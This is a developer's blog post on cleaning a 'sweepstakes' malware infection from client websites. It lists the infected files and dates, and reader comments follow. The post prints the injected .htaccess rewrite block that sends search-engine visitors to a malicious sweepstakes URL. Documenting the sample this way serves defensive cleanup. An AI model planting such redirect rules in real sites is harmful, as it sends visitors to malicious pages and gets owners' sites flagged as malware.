Fixing Sweepstakes Malware Virus

This week, a client of mine ran into an issue in which their sites were sending back “Site contains malware” errors. When going to these sites through a search engine, a new URL was triggered and the user was redirected to their original search engine.

After spending some time cleaning this up I wrote the following documentation. There are already several posts on this out there, but the more posts there are, the easier it will be for someone to fix it.

Keep in mind, the sites I was fixing were not WordPress:

My Documentation of the Malware

To give you some details of what I’ve been doing and for records, I’ve been looking at our main directories to check if anything has been updated recently.

The majority of things that are infected were updated on 11/10/11. The infected files include .htaccess and usually the ‘images’ directory, in which two .php files are placed, usually named by firstname_lastname.php or firstname_firstname.php.

In the .htaccess file, I’ve found that a statement is written in that will cause a redirect whenever someone goes to the site via google, bing or any other major search engine. The code is below:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>

The URL that the user is then redirected to appears in the HTML (via Javascript), and once removed alleviates the issue.

I have backed up all .htaccess files in case there are complications after the removal of the file from the directory.

The dates of the .php files were 11/07/11 and 8/23/11 I’m not sure if those dates are significant or not, but that’s when they were placed in the directories.

The .php files are always 28,278 KB.

Sites that appeared after 8/23/11 only had the 11/07/2011 .php file.

Closing Thoughts

If something like this happens to you, it’s okay to freak out. After you have finished freaking out, take a deep breath, step back from the problem and fix it. It may take some looking around in the directories, but it’s better than having your site listed as malware.

Below are some links of other posts related to this virus:
Securi Research Blog – .htaccess Redirect
Securi Research Blog – Javascript Injection

Subscribe
Notify of
guest
3 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Deb
Deb
9 years ago

Hello John,

Thank you sooooo much for posting this. I just got an email from a client with the same issue and she included a link to your blog post. She has two WordPress sites and both were affected. You are greatly appreciated for sharing your findings!

Deb

Deb
Deb
9 years ago

Just an FYI – just tried to visit the links you give under your Closing Thoughts and I’m getting a 404 for both of them. Just in case you want to check on this.

John Hartley is a Director of Product Engineering at Beam Dental in Columbus, OH. With 5+ years of leadership experience he has worked in startups, agencies, and began his career as a freelance Front End Developer. Always looking to iterate, this blog is a place for him to share his knowledge as well as hone his craft, challenge assumptions, and build a strong base of leadership and management knowledge. Connect with him on LinkedIn

3
0
Would love your thoughts, please comment.x
()
x